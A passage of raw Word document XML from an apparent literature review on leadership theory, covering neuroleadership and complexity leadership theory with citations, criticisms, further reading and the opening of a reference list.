        <w:t xml:space="preserve">different parts of the brain activate in response to certain stimuli. </w:t>
      </w:r>
      <w:r w:rsidR="00774AA4">
        <w:t>As an example, a</w:t>
      </w:r>
      <w:r w:rsidR="00AD6CB2">
        <w:t xml:space="preserve">wareness of physiological </w:t>
      </w:r>
      <w:r w:rsidR="00774AA4">
        <w:t xml:space="preserve">reasons why change processes </w:t>
      </w:r>
      <w:r w:rsidR="00AD6CB2">
        <w:t>are so</w:t>
      </w:r>
      <w:r w:rsidR="00774AA4">
        <w:t xml:space="preserve"> often unsuccessful (due</w:t>
      </w:r>
      <w:r w:rsidR="00EF15F7">
        <w:t>, in part,</w:t>
      </w:r>
      <w:r w:rsidR="00774AA4">
        <w:t xml:space="preserve"> to the fact that change provokes sensations of physiological discomfort) </w:t>
      </w:r>
      <w:r w:rsidR="00AD6CB2">
        <w:t xml:space="preserve">means approaches to change can be developed </w:t>
      </w:r>
      <w:r w:rsidR="00EF15F7">
        <w:t>taking into account these</w:t>
      </w:r>
      <w:r w:rsidR="00774AA4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AD6CB2">
        <w:t>reactions</w:t>
      </w:r>
      <w:r w:rsidR="00774AA4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-158083040"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00774AA4">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00774AA4">
            <w:instrText xml:space="preserve"> CITATION Roc06 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="00774AA4">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00774AA4" w:rsidRPr="005C26DE">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Rock &amp; Schwartz, 2006)</w:t>
          </w:r>
          <w:r w:rsidR="00774AA4">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00AD6CB2">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C33C12" w:rsidRDefault="00672A76" w:rsidP="005C26DE">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>There is ongoing work</w:t>
      </w:r>
      <w:r w:rsidR="00D05718">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C33C12">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">to apply findings from neuroscience to leadership, especially in the areas of decision making and problem solving, emotional regulation, collaborating with others and facilitating change </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:cs="Times New Roman"/>
          </w:rPr>
          <w:id w:val="-432665260"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00C33C12">
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C33C12">
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Rin12 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C33C12">
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00C33C12" w:rsidRPr="005C26DE">
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
            <w:t>(Ringleb, et al., 2012)</w:t>
          </w:r>
          <w:r w:rsidR="00C33C12">
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00B7242A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000934DC" w:rsidRDefault="000934DC" w:rsidP="004464C0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Criticisms and challenges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE728C" w:rsidRDefault="001A6A25" w:rsidP="000934DC">
      <w:r>
        <w:t xml:space="preserve">In the context of leadership thought, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>neuroleadership</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> stands apart as a tool rather than a theory. </w:t>
      </w:r>
      <w:r w:rsidR="00640CE5">
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00DE728C">
        <w:t>resented as a subfield within the general field of leadership study</w:t>
      </w:r>
      <w:r w:rsidR="00640CE5">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00DE728C">
        <w:t>advocates suggest reframing traditional leadership and leadership development theories through the lens of neuroscience</w:t>
      </w:r>
      <w:r w:rsidR="00640CE5" w:rsidRPr="00FA16F6">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00640CE5" w:rsidRPr="00FA16F6">
        <w:t>Ringleb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00640CE5" w:rsidRPr="00FA16F6">
        <w:t xml:space="preserve"> &amp; Rock, 2008</w:t>
      </w:r>
      <w:r w:rsidR="00640CE5">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidR="00640CE5" w:rsidRPr="00FA16F6">
        <w:t xml:space="preserve">Rock &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00640CE5" w:rsidRPr="00FA16F6">
        <w:t>Ringleb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00640CE5" w:rsidRPr="00FA16F6">
        <w:t>, 2009)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000934DC" w:rsidRPr="00832162" w:rsidRDefault="000934DC" w:rsidP="004464C0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Further reading</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000934DC" w:rsidRPr="00B86174" w:rsidRDefault="000934DC" w:rsidP="00B86174">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">David Rock &amp; Jeffrey Schwartz ( 2006). ‘The Neuroscience of Leadership’ in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Strategy + Business, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Issue 43.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000934DC" w:rsidRDefault="000934DC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B32E4F" w:rsidRPr="005A0D09" w:rsidRDefault="00D74478" w:rsidP="005C26DE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc374536621"/>
      <w:r w:rsidRPr="005A0D09">
        <w:lastRenderedPageBreak/>
        <w:t>Complexity leaders</w:t>
      </w:r>
      <w:r w:rsidR="00B32E4F" w:rsidRPr="005A0D09">
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0D09">
        <w:t>ip</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="00461FBB" w:rsidRPr="000C5661" w:rsidRDefault="000C5661" w:rsidP="005C26DE">
      <w:pPr>
        <w:pStyle w:val="APSCBulletedtext"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86174">
        <w:t>Complexity leadership a</w:t>
      </w:r>
      <w:r w:rsidR="00461FBB" w:rsidRPr="000C5661">
        <w:t>pplies concepts of complexity theory to the study of leadership</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F3AFA" w:rsidRDefault="00DE728C" w:rsidP="005A0D09">
      <w:r w:rsidRPr="00FA16F6">
        <w:t>Complexity leadership responds to the suggestion that many twentieth century models of leadership fail to capture the leadership dynamic of organi</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA16F6">
        <w:t>ations operating in today’s knowledge driven economy, having been designed to accommodate more traditional hierarchical structures</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1489447388"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00D701B3" w:rsidRPr="005A0D09">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00D701B3" w:rsidRPr="005A0D09">
            <w:instrText xml:space="preserve"> CITATION Lic06 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="00D701B3" w:rsidRPr="005A0D09">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D701B3" w:rsidRPr="005A0D09">
            <w:t xml:space="preserve"> (Lichtenstein, et al., 2006)</w:t>
          </w:r>
          <w:r w:rsidR="00D701B3" w:rsidRPr="005A0D09">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00D701B3" w:rsidRPr="005A0D09">
        <w:t xml:space="preserve">. Complexity leadership </w:t>
      </w:r>
      <w:r w:rsidR="00F623FC">
        <w:t>applies</w:t>
      </w:r>
      <w:r w:rsidR="00124C31">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009B132C" w:rsidRPr="005A0D09">
        <w:t xml:space="preserve">the concepts of complexity theory to the study of </w:t>
      </w:r>
      <w:r w:rsidR="00D701B3" w:rsidRPr="005A0D09">
        <w:t>leadership</w:t>
      </w:r>
      <w:r w:rsidR="00F623FC">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00463B0F">
        <w:t xml:space="preserve"> and considers leadership within the framework of a complex adaptive system</w:t>
      </w:r>
      <w:r w:rsidR="00D701B3" w:rsidRPr="005A0D09">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-718433301"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00D701B3" w:rsidRPr="005A0D09">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00D701B3" w:rsidRPr="005A0D09">
            <w:instrText xml:space="preserve"> CITATION Uhl07 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="00D701B3" w:rsidRPr="005A0D09">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D701B3" w:rsidRPr="005A0D09">
            <w:t>(Uhl-Bien, et al., 2007)</w:t>
          </w:r>
          <w:r w:rsidR="00D701B3" w:rsidRPr="005A0D09">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00463B0F">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00463B0F" w:rsidRPr="00463B0F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00463B0F">
        <w:t xml:space="preserve">A complex adaptive system </w:t>
      </w:r>
      <w:r w:rsidR="00463B0F" w:rsidRPr="00FE5BE5">
        <w:t xml:space="preserve">is composed of </w:t>
      </w:r>
      <w:r w:rsidR="001E0A60">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00463B0F" w:rsidRPr="00FE5BE5">
        <w:t>interdependent agents</w:t>
      </w:r>
      <w:r w:rsidR="001E0A60">
        <w:t xml:space="preserve"> who are bonded in a cooperative dynamic by common goals, outlook, need, etc. They are changeable structures with multiple, overlapping hierarchies</w:t>
      </w:r>
      <w:r w:rsidR="00D67201">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="001E0A60">
        <w:t xml:space="preserve"> and … are linked with one another in a dynamic, interactive network</w:t>
      </w:r>
      <w:r w:rsidR="00BC64E7">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="001E0A60">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="79409733"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="001E0A60">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="001E0A60">
            <w:instrText xml:space="preserve"> CITATION Uhl07 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="001E0A60">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="001E0A60" w:rsidRPr="005A0D09">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Uhl-Bien, et al., 2007)</w:t>
          </w:r>
          <w:r w:rsidR="001E0A60">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="001E0A60">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D05718">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF6CA6" w:rsidRDefault="00463B0F" w:rsidP="005A0D09">
      <w:r w:rsidRPr="00FE5BE5">
        <w:t xml:space="preserve">Complexity leadership theory </w:t>
      </w:r>
      <w:r w:rsidR="001E0A60">
        <w:t xml:space="preserve">explains </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE5BE5">
        <w:t xml:space="preserve">how </w:t>
      </w:r>
      <w:r w:rsidR="001E0A60">
        <w:t>complex adaptive systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE5BE5">
        <w:t xml:space="preserve"> operat</w:t>
      </w:r>
      <w:r w:rsidR="001E0A60">
        <w:t>e within bureaucratic organisations and</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE5BE5">
        <w:t xml:space="preserve"> identif</w:t>
      </w:r>
      <w:r w:rsidR="008E4575">
        <w:t>ies</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE5BE5">
        <w:t xml:space="preserve"> three leadership roles to explore: adaptive (e.g., engaging others in brainstorming to overcome a challenge), administrative (e.g., formal planning according to doctrine), and enabling (e.g., minimizing the constraints of an organizational bureaucracy to enhance follower potential)</w:t>
      </w:r>
      <w:r w:rsidR="001E0A60">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-577676540"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="001E0A60">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="001E0A60">
            <w:instrText xml:space="preserve"> CITATION Uhl07 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="001E0A60">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="001E0A60" w:rsidRPr="005A0D09">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Uhl-Bien, et al., 2007)</w:t>
          </w:r>
          <w:r w:rsidR="001E0A60">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="00FE5BE5">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00391C7B" w:rsidDel="00D701B3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00855F6F">
        <w:t xml:space="preserve">These three leadership functions are intertwined, with the enabling leadership function helping ameliorate the tensions between </w:t>
      </w:r>
      <w:r w:rsidR="005C2360">
        <w:t xml:space="preserve">adaptive and administrative leadership </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1296982945"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="005C2360">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="005C2360">
            <w:instrText xml:space="preserve"> CITATION Uhl07 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="005C2360">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="005C2360">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="005C2360" w:rsidRPr="005C26DE">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Uhl-Bien, et al., 2007)</w:t>
          </w:r>
          <w:r w:rsidR="005C2360">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="005C2360">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="001E0A60">
        <w:t xml:space="preserve">Importantly, complexity leadership theory </w:t>
      </w:r>
      <w:r w:rsidR="00CF6CA6" w:rsidRPr="005A0D09">
        <w:t>suggests that effective leadership does not necessarily reside within a leader’s actions and propose</w:t>
      </w:r>
      <w:r w:rsidR="001E0A60">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00CF6CA6" w:rsidRPr="005A0D09">
        <w:t xml:space="preserve"> that ‘leadership is an emergent event, an outcome of relational interactions among agents’ </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1545828499"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00CF6CA6" w:rsidRPr="005A0D09">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00CF6CA6" w:rsidRPr="005A0D09">
            <w:instrText xml:space="preserve"> CITATION Lic06 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="00CF6CA6" w:rsidRPr="005A0D09">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00CF6CA6" w:rsidRPr="005A0D09">
            <w:t>(Lichtenstein, et al., 2006)</w:t>
          </w:r>
          <w:r w:rsidR="00CF6CA6" w:rsidRPr="005A0D09">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00CF6CA6" w:rsidRPr="005A0D09">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00855F6F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000934DC" w:rsidRDefault="000934DC" w:rsidP="004464C0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Criticisms and challenges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00614906" w:rsidRDefault="00DA099D" w:rsidP="006A7F7D">
      <w:r>
        <w:t xml:space="preserve">The challenge for complexity leadership theory is that </w:t>
      </w:r>
      <w:r w:rsidR="00E32BE7">
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> level of analysis </w:t>
      </w:r>
      <w:r w:rsidR="00E32BE7">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r>
        <w:t>different</w:t>
      </w:r>
      <w:r w:rsidR="00E32BE7">
        <w:t xml:space="preserve"> to other leadership thinking. As noted by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E32BE7">
        <w:t>Avolio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E32BE7">
        <w:t>, et al ‘o</w:t>
      </w:r>
      <w:r w:rsidR="006A7F7D">
        <w:t>ne of the core propositions of complexity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A7F7D">
        <w:t>leadership theory is that “much of leadership</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A7F7D">
        <w:t>thinking has failed to recognize that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A7F7D">
        <w:t>leadership is not merely the influential act</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A7F7D">
        <w:t>of an individual or individuals but rather</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A7F7D">
        <w:t>is embedded in a complex interplay of numerous</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A7F7D">
        <w:t>interacting forces” (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A7F7D">
        <w:t>Uhl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A7F7D">
        <w:t>-Bien et al.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A7F7D">
        <w:t>2007, p. 302)</w:t>
      </w:r>
      <w:r w:rsidR="00E32BE7">
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-2027861120"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00E32BE7">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00E32BE7">
            <w:instrText xml:space="preserve">CITATION Avo09 \p 431 \n  \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="00E32BE7">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00E32BE7" w:rsidRPr="00B86174">
            <w:t>(2009, p. 431)</w:t>
          </w:r>
          <w:r w:rsidR="00E32BE7">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="006A7F7D">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00614906">
        <w:t xml:space="preserve">This complexity makes the study of this form of leadership particularly difficult, and poses challenges for the individual seeking to apply this thinking to their own leadership practice.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000934DC" w:rsidRPr="00832162" w:rsidRDefault="000934DC" w:rsidP="004464C0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Further reading</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF54BC" w:rsidRDefault="00AF54BC" w:rsidP="00AF54BC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Mary Uhl-Bien, Russ Marion &amp; Bill McKelvey, (2007</w:t>
      </w:r>
      <w:r w:rsidRPr="00955F9C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="005C26DE">
        <w:rPr>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Complexity Leadership Theory: Shifting leadership from the industrial age to the knowledge era</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">’ in </w:t>
      </w:r>
      <w:r w:rsidRPr="005C26DE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>The Leadership Quarterly</w:t>
      </w:r>
      <w:r w:rsidRPr="00955F9C">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 18:4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955F9C">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001938A1" w:rsidDel="00AF54BC" w:rsidRDefault="001938A1" w:rsidP="001938A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00992847" w:rsidRDefault="00992847" w:rsidP="005A0D09">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc374536622"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Reference list</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w:rsidR="005F28E4" w:rsidRDefault="005F28E4" w:rsidP="005A0D09">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B06CAA" w:rsidRPr="003E0C9A" w:rsidRDefault="005F28E4">
      <w:pPr>
        <w:pStyle w:val="Bibliography"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A11345">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:instrText xml:space="preserve"> BIBLIOGRAPHY  \l 3081 </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A11345">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B06CAA" w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Amazon.com, 2013. </w:t>
      </w:r>
      <w:r w:rsidR="00B06CAA" w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Search page. </w:t>
      </w:r>
      <w:r w:rsidR="00B06CAA" w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[Online] Available at: </w:t>
      </w:r>
      <w:r w:rsidR="00B06CAA" w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>www.amazon.com</w:t>
      </w:r>
      <w:r w:rsidR="00B06CAA" w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br/>
        <w:t>[Accessed 19 March 2013].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B06CAA" w:rsidRPr="003E0C9A" w:rsidRDefault="00B06CAA">
      <w:pPr>
        <w:pStyle w:val="Bibliography"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Avolio, B. J., 2010. Pursuing Authentic Leadership Development. In: N. Nohria &amp; R. Khurana, eds. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Handbook of Leadership Theory and Practice. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Cambridge: Harvard Business School Publishing Corporation, pp. 739-768.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B06CAA" w:rsidRPr="003E0C9A" w:rsidRDefault="00B06CAA">
      <w:pPr>
        <w:pStyle w:val="Bibliography"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E0C9A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
